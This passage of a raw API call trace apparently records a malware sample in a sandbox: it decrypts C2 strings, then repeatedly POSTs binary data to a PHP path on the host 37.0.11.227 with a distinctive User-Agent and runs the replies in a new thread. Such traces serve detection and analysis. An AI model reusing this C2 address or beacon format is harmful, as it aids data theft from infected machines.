(in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0216.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.314] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0216.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.315] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0216.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.316] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0216.316] GetProcessHeap () returned 0x690000 [0216.316] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0216.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.317] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0216.335] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.336] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0216.336] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.337] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0216.337] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.338] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0216.338] GetProcessHeap () returned 0x690000 [0216.338] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0216.338] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0216.338] GetProcessHeap () returned 0x690000 [0216.338] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0216.338] GetProcessHeap () returned 0x690000 [0216.339] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0216.339] GetProcessHeap () returned 0x690000 [0216.339] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0216.339] GetProcessHeap () returned 0x690000 [0216.339] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0216.349] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.350] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0216.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.356] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0216.362] GetProcessHeap () returned 0x690000 [0216.362] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0216.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.363] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0216.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.365] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0216.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.366] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0216.366] GetProcessHeap () returned 0x690000 [0216.366] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0216.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.367] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0216.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.368] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0216.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.369] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0216.369] GetProcessHeap () returned 0x690000 [0216.369] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0216.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.370] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0216.370] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.370] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0216.371] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.371] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0216.372] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.372] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0216.372] GetProcessHeap () returned 0x690000 [0216.372] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0216.372] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0216.372] GetProcessHeap () returned 0x690000 [0216.372] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4b0 [0216.372] socket (af=2, type=1, protocol=6) returned 0x538 [0216.372] connect (s=0x538, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0216.398] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0216.398] GetProcessHeap () returned 0x690000 [0216.398] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0216.399] GetProcessHeap () returned 0x690000 [0216.399] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0216.399] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0216.400] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0216.400] GetProcessHeap () returned 0x690000 [0216.400] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0100 [0216.400] GetProcessHeap () returned 0x690000 [0216.400] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0216.401] GetProcessHeap () returned 0x690000 [0216.401] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0216.401] GetProcessHeap () returned 0x690000 [0216.401] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0216.401] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0216.402] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0216.402] GetProcessHeap () returned 0x690000 [0216.402] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0216.402] GetProcessHeap () returned 0x690000 [0216.402] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0216.402] send (s=0x538, buf=0x6ab500*, len=242, flags=0) returned 242 [0216.403] send (s=0x538, buf=0x6aba40*, len=159, flags=0) returned 159 [0216.403] GetProcessHeap () returned 0x690000 [0216.403] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0216.403] recv (in: s=0x538, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0216.481] GetProcessHeap () returned 0x690000 [0216.482] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0216.482] GetProcessHeap () returned 0x690000 [0216.482] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0216.482] GetProcessHeap () returned 0x690000 [0216.482] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0100 | out: hHeap=0x690000) returned 1 [0216.482] GetProcessHeap () returned 0x690000 [0216.483] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0216.483] closesocket (s=0x538) returned 0 [0216.483] GetProcessHeap () returned 0x690000 [0216.483] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4b0 | out: hHeap=0x690000) returned 1 [0216.484] GetProcessHeap () returned 0x690000 [0216.484] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0216.484] GetProcessHeap () returned 0x690000 [0216.484] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0216.484] GetProcessHeap () returned 0x690000 [0216.484] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0216.484] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc18) returned 0x538 [0216.488] Sleep (dwMilliseconds=0xea60) [0216.489] GetProcessHeap () returned 0x690000 [0216.489] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0216.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.490] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0216.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.500] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0216.506] GetProcessHeap () returned 0x690000 [0216.506] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0216.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.507] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0216.508] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.508] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0216.510] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.510] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0216.510] GetProcessHeap () returned 0x690000 [0216.510] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0216.511] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.512] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0216.512] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.512] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0216.513] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.513] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0216.513] GetProcessHeap () returned 0x690000 [0216.513] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0216.514] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.514] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0216.515] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.515] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0216.516] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.516] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0216.516] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.517] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0216.517] GetProcessHeap () returned 0x690000 [0216.517] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0216.517] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0216.517] GetProcessHeap () returned 0x690000 [0216.517] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0216.523] GetProcessHeap () returned 0x690000 [0216.523] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0216.523] GetProcessHeap () returned 0x690000 [0216.523] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0216.523] GetProcessHeap () returned 0x690000 [0216.523] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0216.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.524] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0216.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.528] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0216.535] GetProcessHeap () returned 0x690000 [0216.535] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0216.535] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.536] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0216.536] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.537] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0216.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.537] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0216.537] GetProcessHeap () returned 0x690000 [0216.538] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0216.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.539] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0216.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.540] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0216.540] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.541] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0216.541] GetProcessHeap () returned 0x690000 [0216.542] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0216.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.543] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0216.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.544] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0216.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.545] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0216.545] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.546] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0216.546] GetProcessHeap () returned 0x690000 [0216.546] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0216.546] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0216.546] GetProcessHeap () returned 0x690000 [0216.546] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0216.546] socket (af=2, type=1, protocol=6) returned 0x53c [0216.546] connect (s=0x53c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0216.571] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0216.571] GetProcessHeap () returned 0x690000 [0216.571] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0216.571] GetProcessHeap () returned 0x690000 [0216.571] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0216.571] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0216.572] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0216.572] GetProcessHeap () returned 0x690000 [0216.572] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af500 [0216.572] GetProcessHeap () returned 0x690000 [0216.573] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0216.573] GetProcessHeap () returned 0x690000 [0216.575] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0216.575] GetProcessHeap () returned 0x690000 [0216.575] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0216.575] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0216.576] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0216.576] GetProcessHeap () returned 0x690000 [0216.576] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0216.576] GetProcessHeap () returned 0x690000 [0216.576] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0216.577] send (s=0x53c, buf=0x6ab500*, len=242, flags=0) returned 242 [0216.577] send (s=0x53c, buf=0x6aba40*, len=159, flags=0) returned 159 [0216.577] GetProcessHeap () returned 0x690000 [0216.577] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0216.577] recv (in: s=0x53c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0216.674] GetProcessHeap () returned 0x690000 [0216.674] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0216.674] GetProcessHeap () returned 0x690000 [0216.675] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0216.675] GetProcessHeap () returned 0x690000 [0216.675] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af500 | out: hHeap=0x690000) returned 1 [0216.677] GetProcessHeap () returned 0x690000 [0216.678] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0216.678] closesocket (s=0x53c) returned 0 [0216.678] GetProcessHeap () returned 0x690000 [0216.679] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0216.679] GetProcessHeap () returned 0x690000 [0216.679] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0216.679] GetProcessHeap () returned 0x690000 [0216.679] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0216.679] GetProcessHeap () returned 0x690000 [0216.680] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0216.680] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xbfc) returned 0x53c [0216.683] Sleep (dwMilliseconds=0xea60) [0216.686] GetProcessHeap () returned 0x690000 [0216.686] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0216.687] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.687] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0216.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.702] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0216.709] GetProcessHeap () returned 0x690000 [0216.709] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0216.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.710] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0216.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.711] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0216.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.711] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0216.711] GetProcessHeap () returned 0x690000 [0216.712] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0216.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.713] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0216.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.714] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0216.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0216.715] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0216.715] GetProcessHeap () returned 0x690000 [0216.715] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0216.715] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.716] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0216.716] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0216.716] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", 